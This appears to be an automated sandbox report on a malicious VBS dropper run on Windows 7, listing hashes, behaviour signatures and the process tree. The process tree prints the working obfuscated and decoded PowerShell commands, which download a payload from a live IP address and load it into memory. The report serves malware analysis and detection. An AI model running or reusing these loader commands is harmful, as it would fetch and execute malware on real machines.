Overview

overview

10

Static

static

1

e07ba399fe...c8.vbs

windows7-x64

10

e07ba399fe...c8.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    135s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    06-06-2024 01:58

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    e07ba399fe939b18fc6aeb9b7fc831c746b14d6854d107c9211bf0e7fbcad1c8.vbs

  • Size

    1.7MB

  • MD5

    a980540a1a4a78b65094d486e3146857

  • SHA1

    0e56e92d8a24d97cfb152cfece8a34779f2f2276

  • SHA256

    e07ba399fe939b18fc6aeb9b7fc831c746b14d6854d107c9211bf0e7fbcad1c8

  • SHA512

    26bb57060a3d34b784dda78be84830da894d634f462241ff1dd23b8e41c47673adca9591321fb6426d12d48017f73a2241ed160525dd271948dee9e049249e6c

  • SSDEEP

    768:MRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRRR/V:GIO

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://91.202.233.169/Tak/Reg/Marz/ZQWER/DllXF3.txt

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e07ba399fe939b18fc6aeb9b7fc831c746b14d6854d107c9211bf0e7fbcad1c8.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2428
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bo▒Hk▒bQBz▒GQ▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒Gw▒YgBr▒GQ▒bg▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒HM▒e▒B3▒HE▒cQ▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒Og▒v▒C8▒OQ▒x▒C4▒Mg▒w▒DI▒Lg▒y▒DM▒Mw▒u▒DE▒Ng▒5▒C8▒V▒Bh▒Gs▒LwBS▒GU▒Zw▒v▒E0▒YQBy▒Ho▒LwBa▒FE▒VwBF▒FI▒LwBE▒Gw▒b▒BY▒EY▒Mw▒u▒HQ▒e▒B0▒Cc▒KQ▒p▒Ds▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒EE▒c▒Bw▒EQ▒bwBt▒GE▒aQBu▒F0▒Og▒6▒EM▒dQBy▒HI▒ZQBu▒HQ▒R▒Bv▒G0▒YQBp▒G4▒LgBM▒G8▒YQBk▒Cg▒J▒Bz▒Hg▒dwBx▒HE▒KQ▒u▒Ec▒ZQB0▒FQ▒eQBw▒GU▒K▒▒n▒EM▒b▒Bh▒HM▒cwBM▒Gk▒YgBy▒GE▒cgB5▒DE▒LgBD▒Gw▒YQBz▒HM▒MQ▒n▒Ck▒LgBH▒GU▒d▒BN▒GU▒d▒Bo▒G8▒Z▒▒o▒Cc▒WgB4▒Es▒S▒BH▒Cc▒KQ▒u▒Ek▒bgB2▒G8▒awBl▒Cg▒J▒Bu▒HU▒b▒Bs▒Cw▒I▒Bb▒G8▒YgBq▒GU▒YwB0▒Fs▒XQBd▒C▒▒K▒▒n▒D▒▒LwB4▒Fk▒UQBa▒Hg▒LwBk▒C8▒ZQBl▒C4▒ZQB0▒HM▒YQBw▒C8▒Lw▒6▒HM▒c▒B0▒HQ▒a▒▒n▒C▒▒L▒▒g▒CQ▒b▒Bi▒Gs▒Z▒Bu▒C▒▒L▒▒g▒Cc▒XwBf▒F8▒XwBf▒GQ▒Z▒Bf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒Xw▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒Cc▒L▒▒g▒CQ▒a▒B5▒G0▒cwBk▒Cw▒I▒▒n▒DE▒Jw▒s▒C▒▒JwBS▒G8▒Z▒Bh▒Cc▒I▒▒p▒Ck▒Ow▒=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\e07ba399fe939b18fc6aeb9b7fc831c746b14d6854d107c9211bf0e7fbcad1c8.vbs');powershell -command $KByHL;
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2132
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$hymsd = '0';$lbkdn = 'C:\Users\Admin\AppData\Local\Temp\e07ba399fe939b18fc6aeb9b7fc831c746b14d6854d107c9211bf0e7fbcad1c8.vbs';[Byte[]] $sxwqq = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('http://91.202.233.169/Tak/Reg/Marz/ZQWER/DllXF3.txt'));[system.AppDomain]::CurrentDomain.Load($sxwqq).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('0/xYQZx/d/ee.etsap//:sptth' , $lbkdn , '_____dd__________________-------------', $hymsd, '1', 'Roda' ));"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1944

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    Filesize

    7KB

    MD5

    156cf0a32522fb16a6c4e236659ab82a

    SHA1

    ce658ecce9cc642f74f19e6efe59adb24c581542

    SHA256

    96baf93fc8f03a5a63c65dd69f3355f5192a1eb214fd9e89c696c2726380779d

    SHA512

    01a33e4f9cda1751ccde4a765dd32db95d70d97e2dcde212cc6663d98ee1aa6781cb57a424d3027de31d9f1dbeb6a61ab18d8d0873137a76343810faa3ccfb42

    Download Submit

  • memory/1944-16-0x0000000002990000-0x000000000299A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/2132-4-0x000007FEF514E000-0x000007FEF514F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2132-6-0x0000000001DA0000-0x0000000001DA8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2132-7-0x000007FEF4E90000-0x000007FEF582D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2132-5-0x000000001B670000-0x000000001B952000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2132-8-0x000007FEF4E90000-0x000007FEF582D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2132-10-0x000007FEF4E90000-0x000007FEF582D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2132-15-0x000007FEF4E90000-0x000007FEF582D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2132-17-0x000007FEF4E90000-0x000007FEF582D000-memory.dmp

    Filesize

    9.6MB

    Download